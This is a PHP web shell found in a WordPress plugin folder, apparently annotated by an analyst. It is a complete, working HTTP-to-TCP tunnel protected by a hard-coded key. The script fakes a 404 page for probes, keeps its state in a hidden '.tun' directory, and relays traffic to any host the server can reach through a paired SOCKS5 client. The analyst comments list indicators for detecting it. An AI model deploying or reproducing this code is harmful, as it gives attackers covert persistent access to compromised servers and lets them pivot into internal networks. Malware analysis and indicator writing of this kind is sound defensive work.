File: //proc/thread-self/root/proc/self/root/proc/thread-self/cwd/wp-content/plugins/hgzvgtw/man.php
<?php
/**
* HTTP Tunnel — server side
*
* Upload to your PHP server. Works without exec(), without persistent
* processes, without binding to ports. Every request is short-lived.
*
* Architecture:
* cmd=connect : opens TCP to target, streams data back via HTTP response
* (this is the only long-ish request — stays open while
* the tunnel is active, but keeps sending HTTP data
* so the web server sees it as "actively serving")
* cmd=send : short POST, writes data into a temp file that the
* connect loop picks up and forwards to the target
* cmd=disconnect : signals the connect loop to exit
* cmd=ping : health check
*
* Pair with tunnel_client.py which provides a local SOCKS5 interface.
*/
// ============================================================
// CONFIGURATION — change this key before deploying
// ============================================================
// Analyst note: static shared secret checked on every request. The literal
// below is specific to this sample, so it works as a search string when
// sweeping web roots and backups for further copies of the file.
define('TUNNEL_KEY', 'fn9u24g9unfv87gefojinhf');
// ============================================================
// Per-session queue and marker files live in a hidden ".tun" directory
// next to this script; its presence on disk is a host-side indicator.
define('SESSION_DIR', __DIR__ . '/.tun');
// Turns PHP error reporting off for the whole request.
error_reporting(0);
// The key is taken from query parameter "k", falling back to POST field "k".
$key = $_GET['k'] ?? $_POST['k'] ?? '';
if ($key !== TUNNEL_KEY) {
// Missing or wrong key: status 404 plus a generic "Not Found" HTML body.
// Presumably meant to make unauthenticated probes look like a missing file;
// the body is fixed text and can be matched as a response signature.
http_response_code(404);
echo '<!DOCTYPE html><html><head><title>404</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>';
exit;
}
// "cmd" and "s" are read from the query string only, so they sit in the
// request URL (where access logs usually record them — confirm log format).
$cmd = $_GET['cmd'] ?? '';
// Everything outside [a-zA-Z0-9] is stripped from the session id before it
// is used to build file names under SESSION_DIR.
$session = preg_replace('/[^a-zA-Z0-9]/', '', $_GET['s'] ?? '');
// Creates SESSION_DIR (mode 0700, recursive) once a request has passed the
// key check; @ suppresses any mkdir warning.
if (!is_dir(SESSION_DIR)) @mkdir(SESSION_DIR, 0700, true);
// Command dispatch. With a valid key, an unknown cmd still returns 404 but
// with the short body 'not found' rather than the HTML page above.
switch ($cmd) {
case 'connect': tunConnect(); break;
case 'send': tunSend(); break;
case 'disconnect': tunDisconnect(); break;
case 'ping': header('Content-Type: text/plain'); echo 'pong'; break;
default: http_response_code(404); echo 'not found'; break;
}
exit;
// ============================================================
// CONNECT — long-lived request that holds the TCP connection
// ============================================================
// Opens a TCP connection to the host:port given in query parameter "target"
// and relays traffic between that socket and the HTTP response until the
// peer closes, the marker file disappears, or the HTTP client goes away.
//
// Analyst notes (risk / detection):
// - The only checks on "target" are a non-empty host and a port >= 1; there
//   is no allowlist, so the connection can go to any address the web server
//   itself can reach. Outbound connections from the PHP worker to unexpected
//   hosts or ports are the network-side indicator.
// - The request runs with no PHP time limit and ignores client aborts, so it
//   shows up as an unusually long-lived request/worker.
// - Creates "<session>.in" and "<session>.meta" under SESSION_DIR and removes
//   both on exit; SESSION_DIR itself is not removed by this function.
function tunConnect() {
global $session;
$target = $_GET['target'] ?? '';
if (!$session || !$target) { http_response_code(400); die('bad params'); }
// Keep running after the client disconnects and lift the execution time limit.
ignore_user_abort(true);
set_time_limit(0);
@session_write_close();
// Split at the first ':' into host and port; @ hides the warning raised
// when no port part is present.
@list($host, $port) = explode(':', $target, 2);
$port = intval($port);
if (!$host || $port < 1) { http_response_code(400); die('bad target'); }
// Outbound TCP connect with a 15-second timeout; errors suppressed with @.
$sock = @stream_socket_client("tcp://$host:$port", $errno, $errstr, 15);
if (!$sock) {
// Connect failure is reported as HTTP 502 with body "tcp_fail:" + error text.
http_response_code(502);
die("tcp_fail:$errstr");
}
stream_set_blocking($sock, false);
// Inbox file: data queued by cmd=send. Meta file: holds this process id
// and doubles as the "keep running" marker checked in the loop below.
$inboxFile = SESSION_DIR . "/{$session}.in";
$metaFile = SESSION_DIR . "/{$session}.meta";
file_put_contents($inboxFile, '');
file_put_contents($metaFile, getmypid());
// Any body sent with the connect request is written to the socket first.
$initData = file_get_contents('php://input');
if ($initData !== '' && $initData !== false) {
@fwrite($sock, $initData);
}
// Prepare streaming response — disable every buffer layer
@ini_set('zlib.output_compression', 'Off');
@ini_set('output_buffering', 'Off');
@ini_set('implicit_flush', 1);
if (function_exists('apache_setenv')) @apache_setenv('no-gzip', '1');
while (ob_get_level()) ob_end_clean();
ob_implicit_flush(1);
// Response header set is fixed and can be matched on a proxy or WAF:
// octet-stream content type, X-Accel-Buffering: no, no-cache/no-store,
// and the literal "Content-Encoding: none".
header('Content-Type: application/octet-stream');
header('X-Accel-Buffering: no');
header('Cache-Control: no-cache, no-store');
header('Content-Encoding: none');
// Frame: 4-byte big-endian length + data. Length 0 = keepalive.
// The first frame carries one zero byte, so a successful response body
// starts with the bytes 00 00 00 01 00.
sendFrame("\x00"); // status: connected OK
$lastKA = time();
while (true) {
// Wait for data on the target socket (up to 50ms)
$r = [$sock]; $w = $e = null;
@stream_select($r, $w, $e, 0, 50000);
if ($r) {
// Read up to 64 KiB from the target and relay it as one frame.
$data = @fread($sock, 65536);
if ($data !== '' && $data !== false) {
sendFrame($data);
$lastKA = time();
}
}
// Target closed the connection.
if (@feof($sock)) break;
// Forward queued client data from the inbox file
// (the file is re-stat'ed on every pass of the loop).
clearstatcache(true, $inboxFile);
if (file_exists($inboxFile) && @filesize($inboxFile) > 0) {
$fh = @fopen($inboxFile, 'c+');
// Non-blocking exclusive lock: if a cmd=send writer holds the lock,
// this pass is skipped and the data is picked up on a later one.
if ($fh && flock($fh, LOCK_EX | LOCK_NB)) {
$queued = stream_get_contents($fh);
// Empty the inbox while still holding the lock.
ftruncate($fh, 0);
rewind($fh);
flock($fh, LOCK_UN);
fclose($fh);
if ($queued !== '' && $queued !== false) {
@fwrite($sock, $queued);
}
} else {
if ($fh) fclose($fh);
}
}
// Stop signal
// (cmd=disconnect deletes the meta file).
if (!file_exists($metaFile)) break;
// Keepalive every 20s to prevent web server / proxy timeout
if (time() - $lastKA >= 20) {
sendFrame('');
$lastKA = time();
}
// Check if the HTTP connection is still alive
if (connection_aborted()) break;
}
// Cleanup: close the target socket and delete both session files.
@fclose($sock);
@unlink($inboxFile);
@unlink($metaFile);
}
// ============================================================
// SEND — short request, queues data for the connect loop
// ============================================================
// Appends the raw request body to "<session>.in" under SESSION_DIR, where
// the connect loop reads it and writes it to the target socket.
//
// Analyst notes:
// - fopen mode 'a' creates the file if it does not exist, and nothing here
//   checks for a matching connect loop, so stray ".in" files can remain in
//   SESSION_DIR after a session has ended.
// - The reply is always the plain-text body 'ok', whether or not anything
//   was written; many short POSTs with that reply alongside one long-lived
//   request is the traffic shape this design produces.
function tunSend() {
global $session;
if (!$session) { http_response_code(400); die('no session'); }
$inboxFile = SESSION_DIR . "/{$session}.in";
$data = file_get_contents('php://input');
if ($data !== '' && $data !== false) {
$fh = @fopen($inboxFile, 'a');
if ($fh) {
// Blocking exclusive lock so the append does not interleave with the
// connect loop's read-and-truncate of the same file.
flock($fh, LOCK_EX);
fwrite($fh, $data);
flock($fh, LOCK_UN);
fclose($fh);
}
}
header('Content-Type: text/plain');
echo 'ok';
}
// ============================================================
// DISCONNECT — signals the connect loop to stop
// ============================================================
// Deletes "<session>.meta" and "<session>.in" under SESSION_DIR. The connect
// loop exits once the meta file is gone. Replies with plain-text 'ok'
// whether or not the files existed (unlink errors are suppressed with @).
//
// Analyst note: SESSION_DIR itself is left in place, so the ".tun" directory
// can outlive every session and remains a host-side artefact.
function tunDisconnect() {
global $session;
if (!$session) { http_response_code(400); die('no session'); }
@unlink(SESSION_DIR . "/{$session}.meta");
@unlink(SESSION_DIR . "/{$session}.in");
header('Content-Type: text/plain');
echo 'ok';
}
// ============================================================
// Writes one frame to the HTTP response and flushes it immediately.
// Wire format: 4-byte big-endian unsigned length (pack 'N') followed by the
// payload bytes. An empty payload therefore yields exactly four zero bytes,
// which tunConnect uses as its keepalive.
//
// Analyst note: the length-prefixed framing inside an octet-stream response
// body is a content-level signature for inspecting captured traffic.
function sendFrame($data) {
// strlen() counts bytes, so the prefix is the payload's byte length.
$frame = pack('N', strlen($data)) . $data;
echo $frame;
flush();
}